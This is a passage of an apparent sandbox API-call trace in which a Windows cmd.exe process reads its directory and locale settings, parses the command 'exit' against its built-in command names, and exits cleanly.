_String2="HIGHESTNUMANODENUMBER") returned 3 [0053.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef900 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.459] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef900, lpFilePart=0x1ef8fc | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x1ef8fc*="Desktop") returned 0x20 [0053.459] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0053.459] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef67c | out: lpFindFileData=0x1ef67c) returned 0x380058 [0053.459] FindClose (in: hFindFile=0x380058 | out: hFindFile=0x380058) returned 1 [0053.459] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", lpFindFileData=0x1ef67c | out: lpFindFileData=0x1ef67c) returned 0x380058 [0053.459] FindClose (in: hFindFile=0x380058 | out: hFindFile=0x380058) returned 1 [0053.459] _wcsnicmp (_String1="BGC6U8~1", _String2="BGC6u8Oy yXGxkR", _MaxCount=0xf) returned 15 [0053.459] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFindFileData=0x1ef67c | out: lpFindFileData=0x1ef67c) returned 0x380058 [0053.459] FindClose (in: hFindFile=0x380058 | out: hFindFile=0x380058) returned 1 [0053.459] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0053.459] SetCurrentDirectoryW (lpPathName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 1 [0053.459] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 1 [0053.459] GetEnvironmentStringsW () returned 0x3803e0* [0053.460] FreeEnvironmentStringsW (penv=0x3803e0) returned 1 [0053.460] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.460] GetUserDefaultLCID () returned 0x409 [0053.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0053.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efa40, cchData=128 | out: lpLCData="0") returned 2 [0053.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efa40, cchData=128 | out: lpLCData="0") returned 2 [0053.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efa40, cchData=128 | out: lpLCData="1") returned 2 [0053.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0053.461] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0053.461] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0053.467] GetConsoleTitleW (in: lpConsoleTitle=0x3803e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0053.467] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0053.467] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0053.467] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0053.468] _wcsicmp (_String1="exit", _String2=")") returned 60 [0053.468] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0053.468] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0053.468] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0053.468] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0053.468] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0053.468] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0053.469] GetConsoleTitleW (in: lpConsoleTitle=0x1ef738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.469] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0053.469] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0053.469] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0053.469] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0053.469] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0053.469] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0053.469] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0053.469] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0053.469] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0053.469] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0053.469] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0053.469] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0053.469] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0053.469] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0053.469] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0053.469] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0053.469] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0053.469] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0053.469] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0053.469] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0053.469] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0053.469] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0053.469] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0053.469] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0053.469] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0053.469] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0053.469] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0053.469] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0053.470] exit (_Code=0)